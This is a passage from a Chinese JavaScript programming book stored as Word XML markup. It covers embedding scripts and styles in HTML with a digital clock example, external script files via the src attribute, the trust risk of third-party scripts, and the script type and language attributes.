      <w:r>
        <w:t>JavaSc</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ript</w:t>
      </w:r>
      <w:r>
        <w:t>代码以及</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表是如何嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件里。注意这个例子和例</w:t>
      </w:r>
      <w:r>
        <w:t>13-1</w:t>
      </w:r>
      <w:r>
        <w:t>的结构类似，并同样使用</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-2</w:t>
      </w:r>
      <w:r>
        <w:t>：实现一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数字时钟程序</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w:t>
      </w:r>
      <w:r>
        <w:t>这是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>根节点</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>标题、脚本和样式都放在这里</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Digital Clock</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//js</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个函数用以显示当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function displayTime(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=document.getElementById("clock");//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>id="clock"</w:t>
      </w:r>
      <w:r>
        <w:t>找到元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var now=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>得到当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.innerHTML=now.toLocaleTimeString();//</w:t>
      </w:r>
      <w:r>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>来显示它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(displayTime,1000);//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>秒后再次执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=displayTime;//</w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生时开始显示时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>钟表的样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#clock{/*</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>id="clock"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素的样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font:bold 24pt sans;/*</w:t>
      </w:r>
      <w:r>
        <w:t>使用粗体大号字</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>background:#ddf;/*</w:t>
      </w:r>
      <w:r>
        <w:t>定义蓝灰色背景</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding:10px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>周围有一圈空白</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:solid black 2px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>定义纯黑色边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border-radius:10px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>定义圆角（如果浏览器支持的话）</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</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!--body</w:t>
      </w:r>
      <w:r>
        <w:t>部分是用来显示文档的</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Digital Clock</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>显示标题</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span id="clock"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>输出时钟</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="13_2_2_Wai_Bu_Wen_Jian_Zhong_De_Jiao_Ben"/>
      <w:r>
        <w:t>13.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　外部文件中的脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="308"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签支持</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这个属性指定包含</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的文件的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。它的用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r>
        <w:t>src="../../scripts/util.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件的扩展名通常是以</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:t>结尾的。它包含纯粹的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，其中既没有＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签，也没有其他</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>具有</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的行为就像指定的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件的内容直接出现在标签＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞之间一样。注意，即便指定了</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性并且＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间没有</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，结束的＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签也是不能丢</w:t>
      </w:r>
      <w:r>
        <w:t>的。在</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>中，在此处可以使用简短的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script/</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间的任何内容都会忽略。如果需要，可以在＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间添加代码的补</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>充说明文档或版权信息。但是要注意，如果有任何非空格或</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>注释的文本出现在＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src=""</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞之间，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>校验器将会报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下是</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性方式的一些优点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以把大块</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码从</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件中删除，这有助于保持内容和行为的分离，从而简化</w:t>
      </w:r>
      <w:r>
        <w:t>HT</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果多个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面共用相同的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，用</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以让你只管理一份代码，而不用在代码改变时编辑每个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件由多个页面共享，就只需要下载它一次，通过使用它的第一个页面</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>随后的页面可以从浏览器缓存检索它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值可以是任意的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，因此来自一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序或</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面可以使用由另一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器输出的代码。很多互联网广告依赖与此。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>从其他网站载入脚本的能力，可以让我们更好地利用缓存。</w:t>
      </w:r>
      <w:r>
        <w:t>Goog</w:t>
      </w:r>
      <w:r>
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:t>正在为通用的客户端类库推广标准且好记的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>，可以让浏览器只缓存一份副本，并且网络上的任意站点都可以使用。链接</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码到</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>服务器，可以减少</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面的启动时间，因</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为这些类库可能已经存在于用户的浏览器缓存中，但是你必须相信由第三方提供的代码服务，这对于你的站点来说很关键。参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/apis/ajaxlibs/</w:t>
      </w:r>
      <w:r>
        <w:t>查看更多信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从文档服务器之外的服务器里载入脚本有重要的安全隐患。</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍的同源安全策略会阻止一个域的文档中的</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>和另一个域的内容进行交互。但是，要注意和脚本本身的来源并没有关系，而是和脚本嵌入的文档的来源有关系。因此，同源策略并不适用于如下情况：即便代码和文档有着不同的来源，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码也可以和它嵌入的文档进行交互。当在页面中用</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性包含一个脚本时，就给了脚本作者（以及从中载入这段脚本的域的网站管理员）完全控制</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="309" w:name="13_2_3_Jiao_Ben_Lei_Xing_"/>
      <w:r>
        <w:t>13.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　脚本类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的原始脚本语言，而在默认情况下，假定＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素包含或引用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。如果要使用不标准</w:t>
      </w:r>
      <w:r>
        <w:t>的脚本语言，如</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>VBScript</w:t>
      </w:r>
      <w:r>
        <w:t>（只有</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>支持），就必须用</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定脚本的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script type="text/vbscript"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>这里是</w:t>
      </w:r>
      <w:r>
        <w:t>VBScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</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type</w:t>
      </w:r>
      <w:r>
        <w:t>属性的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>"text/javascript"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果需要，可以显式指定此类型，但这完全没必要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>老的浏览器在＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标记上用</w:t>
      </w:r>
      <w:r>
        <w:t>language</w:t>
      </w:r>
      <w:r>
        <w:t>属性代替</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这种情况现在也会经常看到：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r>
        <w:t>language="javascript"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:t>……</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language</w:t>
      </w:r>
      <w:r>
        <w:t>属性已经废弃，不应该再使用了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
